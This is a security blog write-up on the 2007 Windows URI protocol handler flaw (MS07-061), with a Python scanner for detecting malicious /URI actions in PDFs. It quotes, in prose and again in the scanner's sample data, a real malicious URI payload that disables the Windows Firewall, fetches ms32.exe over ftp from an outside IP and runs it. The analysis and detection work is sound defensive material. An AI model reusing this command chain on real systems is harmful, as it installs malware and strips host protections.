Windows URI protocol handling vulnerability

This is an interesting vulnerability that was first published at the end of July 2007 but only really brought to light at the end of October 2007, when spammers exploited it by sending a specially crafted
URI (Uniform Resource Identifier) containing a "%" character and ending with a certain extension (e.g. ".bat" or ".cmd").

Installing Internet Explorer 7 on Windows XP or Server 2003 changes the way
Windows handles URIs. This change introduced a flaw that can cause
Windows to incorrectly determine the appropriate handler for the protocol
specified in a URI, so that what looks like a mailto: link can end up being handed to cmd.exe.

In other words, it is an input validation error in the handling of URIs
with registered URI handlers
(e.g. "mailto", "news", "nntp", "snews", "telnet", and "http").

Adobe Reader and Firefox, to name a few, are applications that have been used as attack
vectors to exploit this vulnerability: any application that passes an attacker-supplied URI to the Windows shell without validating it first will do.

The malicious PDF file that was spammed and brought to my attention was called "report.pdf" and was only 3,919 bytes in size.

Here is the embedded code; what it does is obvious:

<</URI(mailto:%/../../../../../../windows/system32/cmd".exe"" /c /q
\"@netsh firewall set opmode mode=disable&@echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\" \"&\" "con.cmd)/S/URI>>


As you can see, the remote code execution was beautifully crafted.

cmd.exe is run with /c (execute the command line, then exit) and /q (echo off), and every command in the chain is prefixed with @ so nothing is echoed. Here are the steps it takes:

1. netsh firewall set opmode mode=disable
   - disables the Windows Firewall.
2. echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7
   - writes a four-line ftp script (open 203.121.69.116, binary mode, get /ms32.exe, quit) to a file named 7.
3. ftp -s:7 -v -A>nul
   - runs ftp with that script (-s:7), logging in anonymously (-A) and suppressing the server responses (-v), which downloads the malware ms32.exe.
4. del /q 7
   - deletes the script.
5. start ms32.exe
   - finally executes the malware ms32.exe.
6. GAMEOVER :)
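Putting the above together, here is an added example (written for this write-up; it is not code from the original post, from Adobe, Mozilla or any of the AV vendors referenced) that scans raw PDF bytes for /URI actions, decodes each PDF literal string the way a reader would (dropping the backslashes in front of the quotes), flags URIs that match the handler-abuse shape described at the top (a non-http handler, a "%", and a .bat/.cmd tail), and splits the embedded cmd.exe chain back into the numbered steps above. SAMPLE_PDF is constructed for the demo: the object numbers, the benign http://example.com link and the PDF framing are made up, and only the /URI(...) string is the payload quoted from the post. The indicator names ("percent", "traversal", "ext.cmd") are this example's own labels.

```python
"""Scan PDF bytes for /URI actions matching the MS07-061 handler-abuse shape.
Added example for this write-up, not code from the original post or any vendor
it references. SAMPLE_PDF is constructed: the object framing is made up; only
the /URI(...) string is the payload quoted in the post."""
from __future__ import annotations
import re

# Handlers the write-up names; http is registered too, but the payload rides on these.
SUSPECT_SCHEMES = ("mailto", "news", "nntp", "snews", "telnet")
BAD_EXTENSIONS = (".bat", ".cmd")

SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<</Type/Action/S/URI/URI(http://example.com/report)>>\nendobj\n"
    b"2 0 obj\n<</URI(mailto:%/../../../../../../windows/system32/cmd\".exe\"\" /c /q "
    b"\\\"@netsh firewall set opmode mode=disable&@echo o 203.121.69.116>7"
    b"&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7"
    b"&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\\\" \\\"&\\\" \"con.cmd)/S/URI>>\n"
    b"endobj\n"
)

ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
           b"(": b"(", b")": b")", b"\\": b"\\"}  # PDF 1.7 section 7.3.4.2

def read_literal_string(data: bytes, start: int) -> tuple[bytes, int]:
    """Decode the PDF literal string whose '(' is at data[start]; return
    (decoded, index after the closing ')'). Handles nested parentheses, escapes,
    \\ddd octal and line continuations. A backslash before any other byte is
    dropped, so the payload's \\" decode to the bare quotes the handler sees."""
    out, depth, i = bytearray(), 1, start + 1
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            nxt = data[i + 1:i + 2]
            if nxt in ESCAPES:
                out += ESCAPES[nxt]
                i += 2
            elif nxt and nxt in b"01234567":
                m = re.match(rb"[0-7]{1,3}", data[i + 1:i + 4])
                out.append(int(m.group(0), 8) & 0xFF)
                i += 1 + len(m.group(0))
            elif nxt in (b"\r", b"\n"):  # backslash-EOL: line continuation
                i += 3 if data[i + 1:i + 3] == b"\r\n" else 2
            else:
                out += nxt
                i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out), i + 1
        out += c
        i += 1
    raise ValueError("unterminated literal string")

def extract_uri_actions(data: bytes) -> list[str]:
    """Return every /URI (...) literal string in the file, decoded."""
    return [read_literal_string(data, m.end() - 1)[0].decode("latin-1")
            for m in re.finditer(rb"/URI\s*\(", data)]

def indicators(uri: str) -> list[str]:
    """Abuse markers: non-http handler scheme, a '%', traversal, .bat/.cmd tail."""
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.lower() not in SUSPECT_SCHEMES:
        return []
    found = ["percent"] if "%" in rest else []
    if "../" in rest or "..\\" in rest:
        found.append("traversal")
    tail = rest.rstrip("\"' ").lower()
    return found + ["ext" + e for e in BAD_EXTENSIONS if tail.endswith(e)]

def is_handler_abuse(uri: str) -> bool:
    """The two conditions the write-up gives: '%' present and a .bat/.cmd tail."""
    found = indicators(uri)
    return "percent" in found and any(f.startswith("ext") for f in found)

def command_chain(uri: str) -> list[str]:
    """Split the 'cmd /c /q "..."' payload back into its '&'-joined commands.
    Leading '@' (per-command echo off) and quotes are stripped; the last token
    left over is the 'con.cmd' decoy that supplied the .cmd extension."""
    idx = uri.find(" /c ")
    if idx < 0:
        return []
    rest = uri[idx + 4:].lstrip()
    if rest.startswith("/q"):
        rest = rest[2:].lstrip()
    return [p.strip(' "@') for p in rest.split("&") if p.strip(' "@')]

def ftp_script(chain: list[str]) -> dict[str, list[str]]:
    """Reassemble files written with 'echo ...>name' / '>>name' in the chain;
    for the payload above this recovers the four-line ftp script named '7'."""
    files: dict[str, list[str]] = {}
    for cmd in chain:
        m = re.match(r"echo (.*?)>{1,2}(\S+)$", cmd)
        if m:
            files.setdefault(m.group(2), []).append(m.group(1).strip())
    return files
```

Running extract_uri_actions(SAMPLE_PDF) yields the benign link and the decoded payload; is_handler_abuse() flags only the second, command_chain() returns the eight commands in the order listed above followed by the con.cmd decoy, and ftp_script() recovers the ftp script ("o 203.121.69.116", "binary", "get /ms32.exe", "quit"). The scanner only looks at raw bytes, so a PDF whose objects sit inside FlateDecode'd object streams has to be inflated first, and a URI that exploits the flaw with a different extension will need BAD_EXTENSIONS widening.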


McAfee AV detects the malware as Exploit-PDF
Sophos AV detects the malware as W32/PDF-URI.L
Symantec AV detects the malware as Bloodhound.Exploit.163

Updates for Adobe Reader and Firefox have been released which mitigate this vulnerability.


Microsoft finally released an update on the 13th of November (MS07-061) which replaces shell32.dll, the library that handles the URIs.


References:

http://secunia.com/advisories/26201/
http://www.kb.cert.org/vuls/id/403150/
http://www.us-cert.gov/cas/techalerts/TA07-297B.html
http://www.microsoft.com/technet/security/advisory/943521.mspx
http://vil.nai.com/vil/content/v_139103.htm
http://www.f-secure.com/v-descs/exploit_w32_pdf-uri_l.shtml
http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2007-102318-0451-99&tabid=1

http://www.microsoft.com/technet/security/Bulletin/MS07-061.mspx

[Source: Greyhathacker]
